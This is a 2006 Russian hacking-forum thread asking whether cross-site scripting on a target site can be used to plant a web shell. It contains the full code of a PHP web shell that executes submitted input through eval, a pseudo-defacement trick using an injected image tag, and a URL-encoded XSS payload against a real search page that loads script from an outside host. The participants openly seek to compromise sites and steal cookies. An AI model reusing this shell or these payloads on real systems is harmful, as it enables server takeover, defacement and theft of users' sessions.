Про Xss

Discussion in 'Уязвимости' started by GrAmOzEkA, 9 Dec 2006.

Thread Status:
Not open for further replies.
  1. GrAmOzEkA

    GrAmOzEkA Elder - Старейшина

    Joined:
    25 Jun 2006
    Messages:
    234
    Likes Received:
    76
    Reputations:
    29
    Народ поскажите хсс только ворует куки или можно как то через это загрузить шелл например вот этот:
    Code:
    <?
    
    $docr = $_SERVER['DOCUMENT_ROOT'];
    
    $gpc = get_magic_quotes_gpc();
    if (!empty($_POST['c'])) {
    	$c = $gpc ? stripslashes($_POST['c']) : $_POST['c'];
    } else {
    	$c = NULL;
    }
    
    ?><form action="" method="post">
    <textarea cols="80" rows="30" name="c" id="c"><?=$c; ?></textarea>
    <br><input type="submit">
    </form><?
    
    if (!is_null($c)) eval($c);
    ?>
    Урл сайта имеет вид: http://*****.ru/info.php?log=[XSS]
     
  2. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    497
    Likes Received:
    708
    Reputations:
    748
    Врятли! :(
     
  3. __XT__

    __XT__ Elder - Старейшина

    Joined:
    7 Nov 2006
    Messages:
    10
    Likes Received:
    17
    Reputations:
    7
    шелл через кроссайтскриптинг?
    вопрос интересный.
    если активная xss вы к примеру можете закодировать в страничку екзешник какой нить троян.
    или Сделать псевдо-дефейс-)))
    Это когда к примеру нашёл активную хсс на гл. страничке сайта и по средствам вставки скрипта перекрывающего страничку можно вставить тэги и устроить дефейс.


    как год назад: http://history-php-fusion.narod.ru/123.PNG
    а вставка была в <img src=javascript:document.wite('AIRSG')>
     
  4. GrAmOzEkA

    GrAmOzEkA Elder - Старейшина

    Joined:
    25 Jun 2006
    Messages:
    234
    Likes Received:
    76
    Reputations:
    29
    Да это я знаю сам прикалывался ,а вот насколько реально запустить шелл через хсс?
    (ХСС активная.)
     
  5. FQziT

    FQziT Elder - Старейшина

    Joined:
    3 Nov 2005
    Messages:
    543
    Likes Received:
    156
    Reputations:
    206
    Это вообще невозможно.
     
  6. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    497
    Likes Received:
    708
    Reputations:
    748
    __XT__ Даже при поможи пасифки можно такое сделать
    Даже вставить целвый html файл!
     
  7. GrAmOzEkA

    GrAmOzEkA Elder - Старейшина

    Joined:
    25 Jun 2006
    Messages:
    234
    Likes Received:
    76
    Reputations:
    29
    А если шелл попробовать запустить как каритинку таким образом:
    <img src="Ссылка на шелл-картинку" alt="" border="0">
     
  8. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    497
    Likes Received:
    708
    Reputations:
    748
    Конечно же не выйдет! )
    Но можно вставить js так а в нём будит типо
    document.wite
    Так тока html файлы вставлять!
    Можно Фейк сделать неплохой!

    http://planeta.rambler.ru/srch?words=%22%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%6D%69%72%69%6E%65%74%2E%6E%61%72%6F%64%2E%72%75%2F%31%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E

    Вот вам пример!
    http://guap-spb.jino-net.ru/log01.txt

    посмотрите всё просто!
     
    #8 slider, 9 Dec 2006
    Last edited: 9 Dec 2006
  9. GrAmOzEkA

    GrAmOzEkA Elder - Старейшина

    Joined:
    25 Jun 2006
    Messages:
    234
    Likes Received:
    76
    Reputations:
    29
    И что этим фейком можно делать? Только жертв заманивать.
    Мнеб чёнить такое чтоб можно было файл загрузить или просматреть.
     
    #9 GrAmOzEkA, 9 Dec 2006
    Last edited: 9 Dec 2006
  10. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,091
    Likes Received:
    671
    Reputations:
    591
    Да нельзя шелл через хсс.Зарубите на носу это.Закрыто.Самое полезное - куки.
     
Thread Status:
Not open for further replies.